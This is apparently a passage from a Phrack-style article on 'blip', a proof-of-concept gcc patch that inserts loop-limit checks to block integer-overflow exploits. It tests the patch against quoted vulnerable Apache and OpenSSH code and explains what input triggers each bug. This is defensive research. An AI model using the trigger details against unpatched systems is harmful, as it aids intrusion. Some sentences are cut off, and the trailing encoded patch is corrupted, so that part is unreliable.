Next thing you may want to do is to sit down and carefully read the gcc 
internal documents. ( For the sake of this patch, you should be familiar 
with the first 9 sections of this document ) The document is located

Assuming you read the document and you want to go to the next level, I 
recommend to have a set of simple programs to be used as compiler 
language file, your debugger of choice, and start debugging the compiler. 
Some good break points that you might find useful are:

  - add_stmt : called whenever the parser decides to add a new statement 
into the AST. This break point may be very handy when it is not so clear 
how a specific tree node is being created. By breaking on add_stmt and 
checking up the call stack, it is easy to find more interesting places to 
dig into.

  - rest_of_compiliation : called whenever a function was completely 
converted into AST representation. If you are interested to check out how 
the AST is turning into RTL this is a good place to start.

  - expand_stmt: called each time a statement is about to be expanded 
into RTL code. Setting a Break point here will allow you to easily 
investigate the structure of an AST tree node without the need to go 
through endless nesting levels. 

<TIP> Since the gcc compiler will end up calling the cc1 compiler for *.c 
files, you may want to debug cc1 in the first place, and save yourself 
the trouble of making your debugger follow the child process of gcc 

Soon enough you will need some reference for all the little macros used 
while messing with the AST tree. For that I recommend getting familiar 
with the following files:


----[ 4.4 - Patch Goals 

Like every project in life, you have to define the project goals.  First 
you better know if you reached your goals. Second, which is not less 
important, since resources are limited, it is much easier to protect 
yourself from a never-ending project. 

The goals of this patch were above all to be a proof of concept for the 
suggested integer exploits prevention scheme. Its therefore *not* a goal 
to solve all current and future problems in the security world, or even 
not to solve all exploits that have integer input related to them.

The second goal of this implementation is to keep the patch simple. Since 
the patch is only a proof of concept, we preferred to keep things simple 
and avoid fancy solutions if they required more complex code. 

Last but not least the third goal is to make this patch usable. That 
means easy to use, intuitive, and able to protect real world packages 
bigger then 30 lines of code :).

----[ 4.5 - Patch overview

The patch will introduce a new flag to the gcc compiler named "blip". By 
compiling a file using the -fblip flag,  the compiler  generates code 
that will check for the "blip" condition for every for/while loop and for 
every call to a "loop like" function.

A "loop like" function is any function that is a synonym for a loop. 
(e.g. memcpy, bcopy, memset, etc.).

The generated check, will evaluate if a loop is about to execute a "Huge" 
number of times. (defined by LIBP_MAX). Each time a loop is about to 
execute, the generated code verifies that the loop limit is smaller than 
the threshold. If an attempt to execute a loop more than the threshold 
value is identified, the __blip_violation() handler will be called 
instead of the loop, leading to a controlled termination of the 

The current version of the patch will support only the C language. This 
decision was made in order to keep this first version of the patch small 
and simple. Also, all the vulnerable packages that this patch was planned 
to protect are written in C. So I thought that having only C is a good 

------[ 4.5.1 - Tactics

Having the above goals in mind, I had to take some decisions during the 
development of the patch. One of the problems I had was to choose the 
right place to hack the code. There are quite a lot of options available, 
and I will try to give some pros and cons for each option, hoping it will 
help others to make educated decisions once they encounter the same 

The first thing that I had to decide was the program representation I 
want to modify. The process of compilation looks more or less like that:

Processing		Program representation
------------		------------
Programming =>	1. Source code
Parsing => 		2. AST
Expanding => 	3. RTL
"final" =>		4. Object file

So what is the right place to implement the checks? 

The following table lists some of the pros and cons for modifying the 
code at different stages during the compilation process.
|Stage        |Pros                         | Cons                      |
| AST         |- Target independent         |- No access to hardware    |
|             |- Language independent       |  Registers, instructions  |
|             |- Optimization independent   |                           |
|             |- High level Access to       |                           |
|             |  language "source"          |                           |
|             |- Intuitive to add code      |                           |
| RTL         |- Target independent         |- Low level "source" access|
|             |- Language independent       |- May interfere with       |
|             |- Full access to target      |  optimization             |
|             |  hardware                   |                           |
| Object file |- Language independent       |- Hardware dependent       |
|             |                             |- Lack syntax information  |
|             |                             |- Modification of flow may |
|             |                             | break compiler logic      |

After some thought I decided to modify the AST representation. It seems 
to be the most natural place to do such a change. First, the patch 
doesn't really need to access low-level information such as hardware 
registers, or even virtual registers allocations. Second, the patch can 
easily modify the AST to inject custom logic into it, while doing the 
same at the RTL level will require major changes, which will hurt the 
abstraction layers defined in gcc.

Solving my second dilemma was not as easy as the first one. Now that AST 
patching was the plan I had in mind, I needed to find the best point in 
time in which I will examine the existing AST tree, and emit my checks on 
it. I had three possible options. 

1) Add a call to my function from the parser code of some language (which 
happened to be C).  By doing so, I have the chance to evaluate and modify 
the tree "on the fly" and therefore save an extra pass over the tree 
later. A clear disadvantage is the patch becomes language dependent. 

2) Wait until the whole function is parsed by the front-end.  Then go 
through the created tree, before converting it to RTL and find the 
places, which require checks, and patch them. An advantage of this method 
is that the patch is no longer language dependent. On the other hand, 
implementing a "tree walk" that will scan a given tree, is quite complex 
and error prone task, which will go against the goals we defined above 
such as simple, and useful patch. 

3) Patch the AST tree *while* it is being converted into RTL. Although 
this option looks like the most advantageous (language independent, no 
need for a tree walk) it still has a major disadvantage which is the 
uncertainty of being able to *safely* modify the AST tree at that time. 
Since the RTL "conversion machine" is already processed some parts of the 
AST tree, it might be dangerous to patch the AST tree at that time.

Finally, I have decided that the goal of making this patch simple, 
implies selecting the first option of calling my evolution functions from 
the C parser.

I've placed the hook into my patch in three locations. Two calls inside 
the c-parse.y (main parser file) code allowing me to examine the FOR and 
WHILE loops and to modify them on the fly. The third call is located 
outside the parser since catching all call locations was quite tricky to 
do from within the parser. Basically since in many different situations a 
CALL_EXPR is created hooking all of them seems to be non-natural. The 
alternative that I found which seems to work just fine for me, was to add 
a call to my function inside the build_function_call() within the c-
typeck.c file (C compiler type-checking expression builder).

The main entry into the patch is the blip_check_loop_limit() function 
which will do all the work of checking if a loop seems to be relevant, 
and to call the right function that will do the actual patching of the 
AST tree.

In order for a loop to be considered it needs to look like a count loop. 
The blip patch will therefore try to examine each loop and decide if the 
loop seems to be a counter loop (exact criteria for examining loops will 
follow). For each count loop an attempt is made to detect the "count" 
variable and the "limit" variable.

Example of simple loops and their variables:
 - for(i=0; i < j; i+=3}{;} ==> Increment loop, i = count j = limit.
 - while(len--){;} ==> decrement loop, len = counter ; 0 = limit.

The current implementation considers a loop as count loop only if:
 - 2 variables are detected in the loop condition 
   (sometimes one of them can be a constant)
 - one of those variables is modified in the loop condition or in the 
loop expr
 - *only one* variable is modified
 - the modification is of the increment / decrement style (++,--,+=,-=)

The code, which examines the loop, is executed in blip_find_loop_vars() 
and it may be improved in the future to identify more loops as count 

After detecting the loop direction, the loop count and the limit, the AST 
tree is modified to include a check that verifies that a big loop is 
reported as a blip violation.

In order to keep the patch simple and risk free, any time a loop seems 
too complex to be understood as count loop, the loop will be ignored 
(Using the blip warning flags its possible to list the ignored loops, and 
the reason why they were ignored). 

------[ 4.5.2 - Modifying the AST

When you start patching complex applications such as gcc, you want to 
make sure you are not causing any "butterfly effect" while modifying 
memory resident structures on the fly. To save yourself from a lot of 
trouble I will suggest avoiding modification to any structure directly. 
But instead use the existing functions that the language parser would 
have used if the code you want to "inject" was found in the original 
source code. Following this layer of encapsulation will save you from 
making mistakes such as forgetting to initialize a structure member, or 
not updating another global variable or flag. 

I found it very helpful to simulate the code injection by actually 
modifying the source code, and tracing the compiler as it builds the AST 
tree, and later mimicking the code creation by using the same functions 
used by the parser to build my new check code. This way I was able to 
eliminate the need of "dirty" access to the AST tree, which I was quite 
afraid of while starting the modification.

Knowing the right set of functions to use to inject any code I would 
like, the question became what would I really like to inject? The answer 
differs a bit between the different loop types. In the case of a for-loop 
the blip patch will add the check expression as the last expression in 
the FOR_INIT statement. In the case of the while loop the blip patch will 
add the check expression as a new statement before the while loop. In the 
case of a function call to a "loop like" function such as memcpy, the 
blip patch will replace the whole call expression with a new condition 
expression, having the __blip_violation on the "true" side, and the 
original call expression on the "false" side.

Let's illustrate the last paragraph with some samples..

Before blip

1) for(i=0;i< len;i++){}

2) While(len--){}	

3) p = memcpy(d,s,l)

After blip

1) for(i=0,<blip_check>?__blip_violation:0;i<len;i++){}

2) <blip_check>?__blip_violation:0;

3) p = <blip_check>?__blip_violation : memcpy(d,s,l)

The <blip_check> itself is quite simple. If the loop is incremental 
(going up) then the check will look like: (limit > count && limit-count > 
max).  If the loop is going down the check will be (count > limit && 
count - limit > max). There is a need to check the delta between the 
count and the limit and not only the limit since we don't want to trigger 
false positive in a loop such as:

len = 0xffff0000;
for(i=len-20;i < len; i++){};

The above example may look at first like an integer exploit. But it may 
also be a legitimate loop which simply happens to iterate over very high 

The function responsible for building the <blip_check> is 
blip_build_check_exp(), and its the code is self-explanatory, so I will 
not duplicate the function comments here.	

One of the difficulties I had while injecting the blip code, was the 
injection of the __blip_violation function into the target file. While 
creating the <blip_check> I simply created expressions which reference 
the same tree nodes I found in the loop condition or as parameter to the 
loop like function call. But the __blip_violation function didn't exist 
in the name space of the compiled file, and therefore trying to reference 
it was a bit trickier, or so I thought. Usually when a CALL_EXPR is 
created, a FUNCTION_DECL is identified (as one of the available function 
visible to the caller) and an ADDR_EXPR is later created to express the 
address of the declared function.  Since __blip_violation was not 
declared , attempts to execute lookup_name() for that name will yield 
an empty declaration. 

Fortunately gcc was kind / forgiving enough, and I was able to build a 
FUNCTION_DECL and reference it leaving all the rest of the work for the 
RTL to figure out. The code, which builds the function call, is located 
in blip_build_violation_call(). The function body of __blip_violation is 
located in the libgcc2.c (Thanks for ProPolice for giving an example..).

<DISCLAIMER> All the modification above is being done in the spirit of 
proof of concept for the blip integer exploits detection. There is no 
warranty that the patch will actually increase the protection of any 
system, nor that it will keep the compiler stable and usable (while using 
-fblip), nor that any of the coding / patching recommendation made in the 
article will make any sense to the hardcore maintainer of the gcc project 

----[ 4.6 - Limitations

This section summarizes the limitations known to me at the time of 
writing this article. I will start from the high-level limitations going 
to the low level technical limitations. 

 - The first limitation is the coverage of the patch. The patch is 
designed to stop integer vulnerabilities that yield big loops. Other 
vulnerabilities that are due to bad design or lack of integer validation 
will not be protected. 

For example the following code is vulnerable but cannot be protected by 
the patch:

void foo(unsigned int len,char* buf){

	char	dst[10];

	if(len < 10){

 - Sometimes a generic integer overflow done "by the book" will not be 
detected. An example for such a case will be the xdr_array vulnerability. 
The problem is due to the fact that the malloc function was called with 
the overflowed expression of *two* different integer input, while the 
blip protection can handle only a single big count loop. When looking at 
the xdr_array loop, we can see that it will be easy for the attacker to 
supply such input integers, that will overflow the malloc expression, but 
will still keep the loop count small.

 - Some count loops will not be considered. One example is a complex 
loop condition and it is non trivial to identify the count loop. Such 
loops must be ignored, or otherwise false positives may occur which may 
lead to undefined execution.

 - [Technical limitation] The current version is designed to work only 
with C language. 

 - [Technical limitation] The current version will not examine embedded 
assembly code which may include "loop" instructions. Therefore allowing 
integer overflow exploitation to go undetected.

--[ 5 - References

[1] StackGuard 
    Automatic Detection and Prevention of Stack Smashing Attacks

[2] ProPolic 
    GCC extension for protecting applications from stack-smashing attacks

[3] GCC
    GNU Compiler Collection

[4] noir
    Smashing The Kernel Stack For Fun And Profit
    Phrack Issue #60, Phile 0x06 by noir

[5] Halvar Flake
    Third Generation Exploits on NT/Win2k Platforms

[6] MaXX
    Vudo malloc tricks
    Phrack Issue 0x39, Phile #0x08

[7] Once upon a free()..
    Phrack Issue 0x39, Phile #0x09

[8] Aleph One
    Smashing The Stack For Fun And Profit
    Phrack Issue 0x31, Phile #0x0E

--[ 6 - Thanks

I want to thanks my team for helping me in the process of creating the 
paper. Thank you Monty, sinan, yona, shok for your helpful comments and 
ideas for improving the paper. If you think the English in this paper is 
broken imagine what my team had to go through :>. Without you guys I 
would never made it.

Thanks to anonymous :> for read proofing the paper, and providing helpful 
technical feedback and reassurance.

--[ 7 - Appendix A - Real life examples

Having the patch ready, I wanted to give it a test drive on one of the 
known and high profile vulnerabilities. The criteria used for checking 
the patch was: 

 - The package should be compiled successfully with the patch 
 - The patch should be able to protect the package against exploitation 
of the known bugs

I've selected to test the patch on Apache httpd and the OpenSSH packages. 
Since both packages are: high profile, have vulnerabilities that the 
patch should is expected to protect against (in vulnerable version), and 
they are big enough to "qa" the patch a little bit.

The protection test was proven to be successful:), and the vulnerable 
version compiled with -fblip proved to be non exploitable. 

The following section explains how to compile the packages with the blip 
patch. We will show the output assembly generated before / after the 
patch for the code which was enabling the exploit to overflow the program 

----[ 7.1 - Apache Chunked encoding

--[ Vulnerability info

Just to make sure that all are in sync with the issue of the apache 
chunked-encoding vulnerability I will list part of the vulnerable code 
followed by some explanation.

Code: Apache src/main/http_protocol.c : ap_get_client_block()

01 len_to_read = get_chunk_size(buffer);

<some code here...>

02 r->remaining = len_to_read;

<some code here...>

03 len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining;
04 len_read = ap_bread(r->connection->client, buffer , len_to_read);

The vulnerability in this case allows a remote attacker to send a 
negative chunk length. Doing so will bypass the check at line 3, and will 
end up with calling the ap_bread() with a huge positive number. 

--[ Testing patch

To compile the apache httpd with the -fblip enabled, one may edit the 
file src/apaci and add the following line at the EOF "echo '-fblip'".

Any attempt to send a negative chunk length after compiling apache httpd 
with the blip patch will end up with the httpd executing the 

According to the blip theory, the attack should trigger some kind of a 
loop. We can see at line 4 of the listed code that a call is made to the 
ap_bread() function. So if the theory is correct we are supposed to find 
a loop inside that function. 

 * Read up to nbyte bytes into buf.
 * If fewer than byte bytes are currently available, then return those.
 * Returns 0 for EOF, -1 for error.
 * NOTE EBCDIC: The readahead buffer _always_ contains *unconverted* 
 * Only when the caller retrieves data from the buffer (calls bread)
 * is a conversion done, if the conversion flag is set at that time.
API_EXPORT(int) ap_bread(BUFF *fb, void *buf, int nbyte)
    int i, nrd;

    if (fb->flags & B_RDERR)
	return -1;
    if (nbyte == 0)
	return 0;

    if (!(fb->flags & B_RD)) {
	/* Unbuffered reading.  First check if there was something in the
	 * buffer from before we went unbuffered. */
	if (fb->incnt) {
	    i = (fb->incnt > nbyte) ? nbyte : fb->incnt;
	    if (fb->flags & B_ASCII2EBCDIC)
		ascii2ebcdic(buf, fb->inptr, i);
	    memcpy(buf, fb->inptr, i);
	    fb->incnt -= i;
	    fb->inptr += i;
	    return i;
	i = read_with_errors(fb, buf, nbyte);
	if (i > 0 && ap_bgetflag(fb, B_ASCII2EBCDIC))
	    ascii2ebcdic(buf, buf, i);
	return i;

    nrd = fb->incnt;
/* can we fill the buffer */
    if (nrd >= nbyte) {
	if (fb->flags & B_ASCII2EBCDIC)
	    ascii2ebcdic(buf, fb->inptr, nbyte);
	memcpy(buf, fb->inptr, nbyte);
	fb->incnt = nrd - nbyte;
	fb->inptr += nbyte;
	return nbyte;

    if (nrd > 0) {
	if (fb->flags & B_ASCII2EBCDIC)
	    ascii2ebcdic(buf, fb->inptr, nrd);
	memcpy(buf, fb->inptr, nrd);
	nbyte -= nrd;
	buf = nrd + (char *) buf;
	fb->incnt = 0;
    if (fb->flags & B_EOF)
	return nrd;

/* do a single read */
    if (nbyte >= fb->bufsiz) {
/* read directly into caller's buffer */
	i = read_with_errors(fb, buf, nbyte);
	if (i > 0 && ap_bgetflag(fb, B_ASCII2EBCDIC))
	    ascii2ebcdic(buf, buf, i);
	if (i == -1) {
	    return nrd ? nrd : -1;
    else {
/* read into hold buffer, then memcpy */
	fb->inptr = fb->inbase;
	i = read_with_errors(fb, fb->inptr, fb->bufsiz);
	if (i == -1) {
	    return nrd ? nrd : -1;
	fb->incnt = i;
	if (i > nbyte)
	    i = nbyte;
	if (fb->flags & B_ASCII2EBCDIC)
	    ascii2ebcdic(buf, fb->inptr, i);
	memcpy(buf, fb->inptr, i);
	fb->incnt -= i;
	fb->inptr += i;
    return nrd + i;

We can see in the code several possible execution flows. Each one of them 
includes a "loop" that moves all the data into the buf parameter. If the 
code supports CHARSET_EBCDIC then the ascii2ebdcdic function executes the 
deadly loop. On other normal cases, the memcpy function implements the 
deadly loop. 

Following is the assembly code generated for the above function. 

	.type	ap_bread,@function
	pushl	%ebp
	movl	%esp, %ebp
	subl	$40, %esp
	movl	%ebx, -12(%ebp)
	movl	%esi, -8(%ebp)
	movl	%edi, -4(%ebp)
	movl	8(%ebp), %edi
	movl	16(%ebp), %ebx
	testb	$16, (%edi)
	je	.L68
	movl	$-1, %eax
	jmp	.L67
	movl	$0, %eax
	testl	%ebx, %ebx
	je	.L67
	testb	$1, (%edi)
	jne	.L70
	cmpl	$0, 8(%edi)
	je	.L71
	movl	8(%edi), %esi
	cmpl	%ebx, %esi
	jle	.L72
	movl	%ebx, %esi
	cmpl	$268435456, %esi          ------------------------
	jbe	.L73
	movl	%esi, (%esp)               Blip Check (Using esi)
	call	__blip_violation
	jmp	.L74                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	%esi, 8(%esp)
	call	memcpy
	subl	%esi, 8(%edi)
	addl	%esi, 4(%edi)
	movl	%esi, %eax
	jmp	.L67
	movl	%edi, (%esp)
	movl	12(%ebp), %eax
	movl	%eax, 4(%esp)
	movl	%ebx, 8(%esp)
	call	read_with_errors
	jmp	.L67
	movl	8(%edi), %edx
	movl	%edx, -16(%ebp)
	cmpl	%ebx, %edx
	jl	.L75
	cmpl	$268435456, %ebx          ------------------------
	jbe	.L76
	movl	%ebx, (%esp)               Blip check (using ebx)
	call	__blip_violation
	jmp	.L77                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	%ebx, 8(%esp)
	call	memcpy
	movl	-16(%ebp), %eax
	subl	%ebx, %eax
	movl	%eax, 8(%edi)
	addl	%ebx, 4(%edi)
	movl	%ebx, %eax
	jmp	.L67
	cmpl	$0, -16(%ebp)
	jle	.L78
	cmpl	$268435456, -16(%ebp)     ------------------------
	jbe	.L79
	movl	-16(%ebp), %eax             Blip check
	movl	%eax, (%esp)                (using [ebp-16])
	call	__blip_violation
	jmp	.L80                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	-16(%ebp), %eax
	movl	%eax, 8(%esp)
	call	memcpy
	subl	-16(%ebp), %ebx
	movl	-16(%ebp), %edx
	addl	%edx, 12(%ebp)
	movl	$0, 8(%edi)
	testb	$4, (%edi)
	je	.L81
	movl	-16(%ebp), %eax
	jmp	.L67
	cmpl	28(%edi), %ebx
	jl	.L82
	movl	%edi, (%esp)
	movl	12(%ebp), %eax
	movl	%eax, 4(%esp)
	movl	%ebx, 8(%esp)
	call	read_with_errors
	movl	%eax, %esi
	cmpl	$-1, %eax
	jne	.L85
	jmp	.L91
	movl	20(%edi), %eax
	movl	%eax, 4(%edi)
	movl	%edi, (%esp)
	movl	%eax, 4(%esp)
	movl	28(%edi), %eax
	movl	%eax, 8(%esp)
	call	read_with_errors
	movl	%eax, %esi
	cmpl	$-1, %eax
	jne	.L86
	cmpl	$0, -16(%ebp)
	setne	%al
	movzbl	%al, %eax
	decl	%eax
	orl	-16(%ebp), %eax
	jmp	.L67
	movl	%eax, 8(%edi)
	cmpl	%ebx, %eax
	jle	.L88
	movl	%ebx, %esi
	cmpl	$268435456, %esi          ------------------------
	jbe	.L89
	movl	%esi, (%esp)               Blip check (using esi)
	call	__blip_violation
	jmp	.L90                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	%esi, 8(%esp)
	call	memcpy
	subl	%esi, 8(%edi)
	addl	%esi, 4(%edi)
	movl	-16(%ebp), %eax
	addl	%esi, %eax
	movl	-12(%ebp), %ebx
	movl	-8(%ebp), %esi
	movl	-4(%ebp), %edi
	movl	%ebp, %esp
	popl	%ebp

One can notice that before any call to the memcpy function (which is one 
of the "loop like" functions), a little code was added which calls 
__blip_violation in the case the 3rd parameter of memcpy is bigger than 

Another thing worth mentioning is the way the injected check is accessing 
this 3rd parameter. In the first block of the injected code the parameter 
is stored at the esi register, at the second block the parameter is 
stored in the ebx register and in the third block the parameter is stored 
on the stack at ebp-16. The reason for that is very simple. Since the 
modification of the code was done at the AST tree, and since the patch 
was using the exact same tree node that was used in the call expression 
to memcpy, the RTL generated the same code for both the call expression 
and the check expression. 

Now lets go back to the ap_bread function. And lets assume that the 
CHARSET_EBCDIC was indeed defined. In that case the ascii2ebcdic function 
would have being the one to have the "vulnerable" loop. Therefore we hope 
that the blip patch would check the loop in that function as well.

The following is the ascii2ebcdic code taken from src/ap/ap_ebcdic.c

API_EXPORT(void *)
ascii2ebcdic(void *dest, const void *srce, size_t count)
    unsigned char *udest = dest;
    const unsigned char *usrce = srce;

    while (count-- != 0) {
        *udest++ = os_toebcdic[*usrce++];

    return dest;

Result of compiling the above function with the -fblip 

	.type	ascii2ebcdic,@function
	pushl	%ebp
	movl	%esp, %ebp
	pushl	%edi
	pushl	%esi
	pushl	%ebx
	subl	$12, %esp
	movl	16(%ebp), %ebx
	movl	8(%ebp), %edi
	movl	12(%ebp), %esi
	cmpl	$0, %ebx            -------------------
	jbe	.L12
	cmpl	$268435456, %ebx
	jbe	.L12                   Blip check
	movl	%ebx, (%esp)
	call	__blip_violation
.L12:                            -------------------
	decl	%ebx
	cmpl	$-1, %ebx
	je	.L18
	movzbl	(%esi), %eax
	movzbl	os_toebcdic(%eax), %eax
	movb	%al, (%edi)
	incl	%esi
	incl	%edi
	decl	%ebx
	cmpl	$-1, %ebx
	jne	.L16
	movl	8(%ebp), %eax
	addl	$12, %esp
	popl	%ebx	
	popl	%esi
	popl	%edi
	popl	%ebp

While processing the ascii2ebcdic function, the blip patch identified the 
while loop as a count-loop. The loop condition supplies all the 
information required to create a <blip_check>. First we identify the 
variables of the loop. In this case "count" is one var and the constant 
"0" is the second one. Looking for variable modification, we can see that 
"count" is decremented in the expression "count--". Since "count" is the 
only modified variable we can say that "count" is the count-variable and 
the constant 0 is the limit-variable. We can also say that the loop is a 
decrement-loop since the modification operation is "--". The check 
therefore will be (count > limit && count - limit > MAX_BLIP). Looking at 
the above assembly code, we can see that the loop count is stored in the 
ebx register (Its easy to spot this by looking at the code below label 12 
(L12). This code represent the while condition. It first decrements ebx 
and later compares it with the loop constant). The <blip_check> therefore 
will utilize the ebx register for the check.

----[ 7.2 - OpenSSH auth

--[ Vulnerability info	

The OpenSSH Vulnerability is an example of an integer overflow bug, which 
results in a miscalculated allocation size. The following is a snippet of 
the vulnerable code:

OpenSSH auth2-chall.c : input_userauth_info_response()

01 nresp = packet_get_int();

<some code here ..>

02 response = xmalloc(nresp * sizeof(char*));
03 for(i = 0; i < nresp; i++)
04	response[i] = packet_get_string(NULL);

At line 01 the code reads an integer into an unsigned variable. Later the 
code allocates an array with nresp entries. The problem is that nresp * 
sizeof(char*) is an expression that may overflow. Therefore sending nresp 
bigger than 0x40000000 allows allocation of a small buffer that can be 
later overflowed by the assignment in line 04.

--[ Testing the patch

To compile the OpenSSH package with the -fblip enabled, one may add -
fblip to the CFLAGS definition at (i.e. [email protected]@ -

Any attempt to send a large number of responses after compiling OpenSSH 
with the blip patch will end up with OpenSSH executing the 

The following is snippet of the vulnerable function. 

static void
input_userauth_info_response(int type, u_int32_t seq, void *ctxt)
	Authctxt *authctxt = ctxt;
	KbdintAuthctxt *kbdintctxt;
	int i, authenticated = 0, res, len;
	u_int nresp;
	char **response = NULL, *method;

	<omitted code>

	nresp = packet_get_int();

	if (nresp != kbdintctxt->nreq)
		fatal("input_userauth_info_response: wrong number of 

	if (nresp > 0) {
			 **  Vulnerable code **

		response = xmalloc(nresp * sizeof(char*));
		for (i = 0; i < nresp; i++)
			response[i] = packet_get_string(NULL);


	<omitted code>

The above function is translated to the following assembly code if 
compiled with the -fblip protection.(In order to make blip modification 
readable, the code was compiled using -O instead of using -O2, which will 
reorder basic blocks)

	.type	input_userauth_info_response,@function

	movl	-16(%ebp), %eax
	movl	$0, 4(%eax)
	call	packet_get_int
	movl	%eax, %esi
	movl	-20(%ebp), %edx
	cmpl	12(%edx), %eax
	je	.L111
	movl	$.LC15, (%esp)
	call	fatal
	testl	%esi, %esi
	je	.L113
	leal	0(,%esi,4), %eax
	movl	%eax, (%esp)
	call	xmalloc
	movl	%eax, -32(%ebp)
	movl	$0, %ebx
	cmpl	$0, %esi
	jbe	.L115
	cmpl	$268435456, %esi          ------------------------
	jbe	.L115
	movl	%esi, (%esp)                   Blip Check
	call	__blip_violation
.L115:                                 ------------------------
	cmpl	%esi, %ebx
	jae	.L113
	movl	$0, (%esp)
	call	packet_get_string
	movl	-32(%ebp), %ecx
	movl	%eax, (%ecx,%ebx,4)
	incl	%ebx
	cmpl	%esi, %ebx
	jb	.L120

The blip patch identified the for-loop as a count-loop and injected a 
code to direct the flow to the _blip_violation handler in the case that 
the limit (i.e. nresp) is bigger then the BLIP_MAX. Therefore if nresp 
value will be high enough to trigger an overflow in the call to xmalloc, 
it will also be high enough to get caught by the <blip_check>.

--[ 8 - Appendix B - Using blip  

To enable the blip patch one should first add the -fblip flag when 
executing the gcc compiler. 

The blip patch will attempt to emit the <blip_check> whenever it seems 
possible to do so. The patch will silently ignore all loops or calls, 
which cannot be protected. In order to see the ignored loops one can use 
one of the following warning flags, which will also provide a message 
describing the reason for ignoring the specific loop.

Warning flags:
- blip_for_not_emit - report ignored for loops.
- blip_while_not_emit - report ignored while loops.
- blip_call_not_emit - report ignored calls to loop like function.

A reason for ignoring a loop will be one of the following:
- Loop variables are less then 4 bytes long
- for init is not an expression
- call to function is made using a pointer to function
- call parameters have side effects. Reusing the expression may cause 
unexpected results
- loop condition is too complex in order to find the loop variables
- non of loop variables is modified (not enough info to make check)
- both loop var are modified
- condition is too complex

The blip patch is also capable of reporting check statistics. Using the 
-fblip_stat one can make the blip patch to print out statistical 
information about amount of loops processed and the amount of loops that 
where successfully checked. 

The following command line will compile the first sample code. The output 
of the compilation will follow

$ gcc -o sample -fblip -fblip_stat -O sample.c

-=] Blip statistics (checks emits)
Total:	1/100%		1/100%
for:	1/100%		1/100%
while:	0/0%		0/0%
calls:	0/0%		0/0%
-=] End Blip Statistics

begin 640 blip.patch
M;@E4:'[email protected]%Y(#(S(#$P.C4W.C(Q(#(P,#(-"BLK*R!G8V,M,RXR+6)L:7`O
M9V-C+TUA:V5F:6QE+FEN"4UO;B!$96,@(#(@,3DZ-#(Z,[email protected],C`P,@T*0$`@
M('1R964M9'5M<"YO(`E<#[email protected]('1R964M:6YL:6YE+F\@=6YR;VQL+F\@=F%R
M+F\@7`T*+2`D*$='[email protected])"AO=71?;V)J96-T7V9I;&4I("0H15A44D%?3T)*
M4RD-"[email protected]<"YO("0H1T=#*2`D*&]U=%][email protected])"A%6%12
M05]/0DI3*0T*(`T*($)!0TM%[email protected]/2!M86EN+F\@;&EB8F%C:V5N9"YA#[email protected]
M#0I`0"`M-S8X+#<@*S<V."PX($!`#[email protected]#[email protected]$E",D953D-37S(@/2!?9FQO
M=&1I=&[email protected]`T*("`@("!?8VQE87)?8V%C:&[email protected];VQI;[email protected]]M86EN
M(%]E>&ET(%]A8G-V<VDR(%]A8G-V9&DR(%]A9&1V<VDS(%P-"[email protected]("`@7V%D
M;B!L:6)G8V,R+F,L(&EN8VQU9&5D(&]N;'[email protected]:[email protected]=&AE('-T871I8R!L:6)R
M87)[email protected]*($Q)0C)&54Y#4U]35"`](%]E<')I;G1F(%]B8B!?7V=C8U]B8VUP
M8V,O8FQI<"YC#[email protected]+3,N,B]G8V,O8FQI<"YC"5=E9"!$96,@,[email protected]
M;B!$96,@(#(@,3DZ-#(Z,[email protected],C`P,@T*0$`@+3`L,"`K,2PX,[email protected]$`-"BLO
M*@T-"[email protected]*B`@("!4:&ES(&9I;&[email protected]:7,@<&%R="!O9B!'[email protected],N#0T**R`J
M#0T**R`J("`@($=.52!#0R!I<R!F<F5E('-O9G1W87)E.R!Y;[email protected]%N(')E
M('1H92!T97)M<R!O9B!T:&[email protected]($=E;[email protected]'5B;&EC($QI8V5N<[email protected]
M;BD-#0HK("[email protected]("`@86YY(&QA=&5R('9E<G-I;VXN#0T**R`J#0T**R`J("`@
M($=.52!#0R!I<R!D:7-T<FEB=71E9"!I;B!T:&[email protected]:&]P92!T:&%T(&ET('=I
M;&[email protected]@=7-E9G5L+`T-"[email protected]*B`@("[email protected]$]55"[email protected]%24D%.
M5%D[('=I=&[email protected];B!T:&[email protected]:6UP;&EE9"!W87)R86YT>[email protected]"[email protected]
M*B`@("!-15)#2$%.5$%"24Q)5%[email protected];W(@1DE43D534R!&3U(@02!005)424-5
M3$%2(%!54E!/4T4N("[email protected]=&AE#0T**R`J("`@($=.52!'96YE<F%L(%!U
M(%EO=2!S:&]U;&[email protected]:&%V92!R96-E:79E9"!A(&-O<'[email protected];[email protected]=&AE($=.52!'
M($-#[email protected]=&AE(&9I;&[email protected]][email protected]($EF(&YO="[email protected]=W)I=&[email protected]=&\-
M#0HK("[email protected]("`@=&AE([email protected]]F='=A<[email protected]]U;F1A=&EO;[email protected]@5&5M
M<&QE(%!L86-E("[email protected]=&[email protected],S,P+`T-"[email protected]*B`@("!";W-T;VXL($U!(#`R
M,3$Q+3$S,#<L(%[email protected]("HO#0T**PT-"BLC:6YC;'5D92`B8V][email protected]
M#0T**R-I;F-L=61E(")S>7-T96TN:"(-#0HK(VEN8VQU9&[email protected](FUA8VAM;V1E
[email protected]#0T**R-I;F-L=61E(")R=&PN:"(-#0HK(VEN8VQU9&[email protected](G1R964N:"(-
M#0HK(VEN8VQU9&[email protected](G1O<&QE=BYH(@T-"BLC:6YC;'5D92`B8FQI<"YH(@T-
M"BLC:6YC;'5D92`B9FQA9W,N:"(-#0HK(VEN8VQU9&[email protected](F,M8V]M;6][email protected]
M;W!?;&EM:[email protected];VYT:6]N#0T**R`J('1O(&-O;6UU;FET8V%T92X-
M#0HK("[email protected]@=&AE(&-O;7!I;&5R(&ES('-I;F=L92!T:')E860L(&%N
M9"!T:&[email protected]<"!C:&5C:W,@87)E(&%L;'=A>7,@#0T**R`J('-T871L97-S
M+"!T:&%N(&ET<R!S869E('1O('5S92!T:&ES('-T<G5C="!A<R!G;&][email protected]
M*PT-"BML;V]P7VQI;6ET7W,@;&]O<%]L:6UI=#L-#0HK#0T**R\J('[email protected]
